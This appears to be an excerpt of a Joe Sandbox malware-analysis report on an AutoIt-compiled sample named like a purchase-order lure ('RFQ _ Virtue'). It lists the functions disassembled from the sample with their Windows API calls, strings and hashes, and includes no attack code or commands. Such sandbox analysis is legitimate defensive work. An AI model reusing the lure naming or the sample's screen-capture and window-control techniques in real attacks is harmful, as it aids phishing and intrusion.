Function 0045AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
_wcscmp.LIBCMT ref: 0045AF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
CharUpperBuffW.USER32(?,00000000), ref: 0045AF6E
_wcscmp.LIBCMT ref: 0045AF8C
_wcsstr.LIBCMT ref: 0045AF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 0045AFD5
_wcscmp.LIBCMT ref: 0045AFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B00C
GetClassNameW.USER32(00000018,?,00000400), ref: 0045B055
_wcscmp.LIBCMT ref: 0045B065
GetClassNameW.USER32(00000010,?,00000400), ref: 0045B08D
GetWindowRect.USER32(00000004,?), ref: 0045B0F6

Strings

@, xrefs: 0045AEF9
ThumbnailClass, xrefs: 0045AFE0, 0045B060

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
Instruction ID: 2113ca19c953e4d0fb0a3bed3b629d6a09082ecb25fab152276a3acc7fd757eb
Opcode Fuzzy Hash: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
Instruction Fuzzy Hash: BD81CF711082059BDB00DF11C881BAB77E8EF4075AF14856FFD859A192DB38DD4DCBAA

Function 0048C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

DragQueryPoint.SHELL32(?,?), ref: 0048C627

Part of subcall function 0048AB37: ClientToScreen.USER32(?,?), ref: 0048AB60
Part of subcall function 0048AB37: GetWindowRect.USER32(?,?), ref: 0048ABD6
Part of subcall function 0048AB37: PtInRect.USER32(?,?,0048C014), ref: 0048ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 0048C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C6BE
_wcscat.LIBCMT ref: 0048C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C705
SendMessageW.USER32(?,000000B0,?,?), ref: 0048C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 0048C735
SendMessageW.USER32(?,000000B1,?,?), ref: 0048C757
DragFinish.SHELL32(?), ref: 0048C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048C851

Strings

@GUI_DRAGFILE, xrefs: 0048C800
%, xrefs: 0048C79B
@GUI_DRAGID, xrefs: 0048C7C9
@GUI_DROPID, xrefs: 0048C77E

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: %$@GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-1419779174
Opcode ID: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
Instruction ID: 4fadb8ae9d86136d60326728fb0320be203031e120dd753c2ba31efb77555f42
Opcode Fuzzy Hash: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
Instruction Fuzzy Hash: 1B617F71108300AFC701EF65CC85D9FBBE8EF88714F50092EF591A22A1DB74A949CB6A

Function 0045ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0045AC33

Strings

[HANDLE:, xrefs: 0045AC3F
LAST, xrefs: 0045ABF8
[ACTIVE, xrefs: 0045AC20
CLASSNAME=, xrefs: 0045AC70
[LAST, xrefs: 0045ACE0
ACTIVE, xrefs: 0045AC0E
ALL, xrefs: 0045ACC7
[REGEXPTITLE:, xrefs: 0045AC5B
HANDLE=, xrefs: 0045AC2C
[ALL, xrefs: 0045ACD9
REGEXP=, xrefs: 0045AC48
[CLASS:, xrefs: 0045AC83

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 52f89f39c4f5c5e735f1cd86a92d30baad3c4cbecdefe61fa6aede404be9d37c
Instruction ID: cc55e2bc6580523fe6938d14c256d65c14dee3a36fa7a852f9c3cef8ae364549
Opcode Fuzzy Hash: 52f89f39c4f5c5e735f1cd86a92d30baad3c4cbecdefe61fa6aede404be9d37c
Instruction Fuzzy Hash: 2C31A370A48209AADB01EA61DE43FEE7774AF14719F60052FB801711D2EB6D6F18C56E

Function 00474FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00475013
LoadCursorW.USER32(00000000,00007F00), ref: 0047501E
LoadCursorW.USER32(00000000,00007F03), ref: 00475029
LoadCursorW.USER32(00000000,00007F8B), ref: 00475034
LoadCursorW.USER32(00000000,00007F01), ref: 0047503F
LoadCursorW.USER32(00000000,00007F81), ref: 0047504A
LoadCursorW.USER32(00000000,00007F88), ref: 00475055
LoadCursorW.USER32(00000000,00007F80), ref: 00475060
LoadCursorW.USER32(00000000,00007F86), ref: 0047506B
LoadCursorW.USER32(00000000,00007F83), ref: 00475076
LoadCursorW.USER32(00000000,00007F85), ref: 00475081
LoadCursorW.USER32(00000000,00007F82), ref: 0047508C
LoadCursorW.USER32(00000000,00007F84), ref: 00475097
LoadCursorW.USER32(00000000,00007F04), ref: 004750A2
LoadCursorW.USER32(00000000,00007F02), ref: 004750AD
LoadCursorW.USER32(00000000,00007F89), ref: 004750B8
GetCursorInfo.USER32(?), ref: 004750C8

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
Instruction ID: d5c7a2001707235dd9e126089dd3671015cbda4ea0a9ffae781a460d29ca5a6d
Opcode Fuzzy Hash: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
Instruction Fuzzy Hash: 7F3114B1D083196ADF109FB68C8999FBFE8FF04750F50453BA50DEB281DA7865048F95

Function 0048A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0048A259
DestroyWindow.USER32(?,?), ref: 0048A2D3

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A382
DestroyWindow.USER32(00000000), ref: 0048A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A3F4
GetDesktopWindow.USER32 ref: 0048A40D
GetWindowRect.USER32(00000000), ref: 0048A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A444

Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC

Strings

tooltips_class32, xrefs: 0048A346, 0048A3D4
0, xrefs: 0048A26F

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
Instruction ID: 021702ee8d535e162beb7c83f4b22bae82635ac61efe1e234d944cc96a30802f
Opcode Fuzzy Hash: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
Instruction Fuzzy Hash: CE719270141204AFE721DF18CC49F6B77E5FB88704F04492EF985972A0D7B8E956CB6A

Function 00484392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00484424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0048446F

Strings

GETTOTALCOUNT, xrefs: 00484456
COLLAPSE, xrefs: 004844B5
ISCHECKED, xrefs: 004845F2
GETITEMCOUNT, xrefs: 00484551
UNCHECK, xrefs: 0048464B
GETSELECTED, xrefs: 0048457F
EXPAND, xrefs: 00484521
GETTEXT, xrefs: 004845C2
SELECT, xrefs: 00484620
CHECK, xrefs: 0048448F
EXISTS, xrefs: 004844D8

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
Instruction ID: 284482c989e2c3ea33895925bad2fd62e2b6eb619b8524f2c72ddc2562c3458e
Opcode Fuzzy Hash: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
Instruction Fuzzy Hash: BF917F712043119BCB04FF11C451A6EB7E1AF95358F44886EF8966B3A3DB38ED0ACB59

Function 0048B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0048B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004891C2), ref: 0048B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0048B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0048B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0048B9C3
FreeLibrary.KERNEL32(?), ref: 0048B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0048B9DF
DestroyIcon.USER32(?,?,?,?,?,004891C2), ref: 0048B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0048BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0048BA17

Part of subcall function 00422EFD: __wcsicmp_l.LIBCMT ref: 00422F86

Strings

.dll, xrefs: 0048B86D
.exe, xrefs: 0048B84A
.icl, xrefs: 0048B82A

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 2fc131844969b4b5c283f9404ec8a9d49153947123385b136b1911b68efed916
Instruction ID: 50163288b7a3e5e0cbad55d9f7afdff750af503695f4b02481751edd59ee4b0a
Opcode Fuzzy Hash: 2fc131844969b4b5c283f9404ec8a9d49153947123385b136b1911b68efed916
Instruction Fuzzy Hash: CC61F2B1900215BEEB14EF65DC41FBF7BA8FB08710F10491AF915D62C1DBB8A984DBA4

Function 0046A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

CharLowerBuffW.USER32(?,?), ref: 0046A3CB
GetDriveTypeW.KERNEL32 ref: 0046A418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

Strings

wait, xrefs: 0046A482
type cdaudio alias cd wait, xrefs: 0046A443
open , xrefs: 0046A427
close, xrefs: 0046A3D1
close cd wait, xrefs: 0046A4B0
open, xrefs: 0046A3F2
closed, xrefs: 0046A3DF, 0046A3E8
set cd door , xrefs: 0046A466

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: c9c3f5bcbb85441f6b74d870dff76a731b9fa90bff3ae6885b825ce50aabd4a2
Instruction ID: 3713139b98a23bb0435d921a878e050fdb512fde8566727adc807e41ed5eba46
Opcode Fuzzy Hash: c9c3f5bcbb85441f6b74d870dff76a731b9fa90bff3ae6885b825ce50aabd4a2
Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A

Function 0048C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
GetFocus.USER32 ref: 0048C20C
GetDlgCtrlID.USER32(00000000), ref: 0048C217
_memset.LIBCMT ref: 0048C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C36D
GetMenuItemCount.USER32(?), ref: 0048C38D
GetMenuItemID.USER32(?,00000000), ref: 0048C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C489

Strings

0, xrefs: 0048C33A

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 33cb3c6b8405937d32b2b71218590862bf0125915e4c77cd60d899db0884abe4
Instruction ID: c475bcefc4ba02209658d373736a3052ec3262963195f5d7aee57ef1aaf8ece4
Opcode Fuzzy Hash: 33cb3c6b8405937d32b2b71218590862bf0125915e4c77cd60d899db0884abe4
Instruction Fuzzy Hash: 17818870608301AFD710EF24D894A7FBBE8EB88714F004D2EF99597291D778D945CBAA

Function 0047731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0047738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
CreateCompatibleDC.GDI32(?), ref: 004773A7
SelectObject.GDI32(00000000,?), ref: 004773B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00477468
SelectObject.GDI32(00000006,?), ref: 00477470
DeleteObject.GDI32(?), ref: 00477479
DeleteDC.GDI32(00000006), ref: 00477480
ReleaseDC.USER32(00000000,?), ref: 0047748B

Strings

(, xrefs: 00477410

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 84b276bb807c7e101a360103dd6cba862059a2a287156f3eb4aec643c0a6f74f
Instruction ID: dfe8a3419fea5eebfe22a8fe4a62b6ec684acb784746aa6277c3acce6f7982dd
Opcode Fuzzy Hash: 84b276bb807c7e101a360103dd6cba862059a2a287156f3eb4aec643c0a6f74f
Instruction Fuzzy Hash: 5D515871904209EFCB14CFA8CC84EAFBBB9EF49310F14852EF959A7211D735A945CB54

Function 00406A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00420957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406B0C,?,00008000), ref: 00420973

Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00406CFA

Part of subcall function 0040586D: _wcscpy.LIBCMT ref: 004058A5

Part of subcall function 0042363D: _iswctype.LIBCMT ref: 00423645

Strings

Unterminated string, xrefs: 0043E7E4
AU3!, xrefs: 00406B61
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0043E421
EA06, xrefs: 0043E452
Bad directive syntax error, xrefs: 0043E79D
Error opening the file, xrefs: 0043E43D, 0043E4B8
>>>AUTOIT SCRIPT<<<, xrefs: 0043E496

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: b6e2dc29c888ed8bfac3d35450cbb81efe1ddaa5dca943981e51a7583d2686c2
Instruction ID: 136c1bde332718f4234bbb9892b60201bfb37e26dd96c6a9a3310cb901d73b7e
Opcode Fuzzy Hash: b6e2dc29c888ed8bfac3d35450cbb81efe1ddaa5dca943981e51a7583d2686c2
Instruction Fuzzy Hash: 2C027D701083419FC714EF25C8419AFBBE5EF98318F54492FF486A72A2DB38D949CB5A

Function 00462D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00462D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00462DDD
GetMenuItemCount.USER32(004C5890), ref: 00462E66
DeleteMenu.USER32(004C5890,00000005,00000000,000000F5,?,?), ref: 00462EF6
DeleteMenu.USER32(004C5890,00000004,00000000), ref: 00462EFE
DeleteMenu.USER32(004C5890,00000006,00000000), ref: 00462F06
DeleteMenu.USER32(004C5890,00000003,00000000), ref: 00462F0E
GetMenuItemCount.USER32(004C5890), ref: 00462F16
SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 00462F4C
GetCursorPos.USER32(?), ref: 00462F56
SetForegroundWindow.USER32(00000000), ref: 00462F5F
TrackPopupMenuEx.USER32(004C5890,00000000,?,00000000,00000000,00000000), ref: 00462F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00462F7E

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

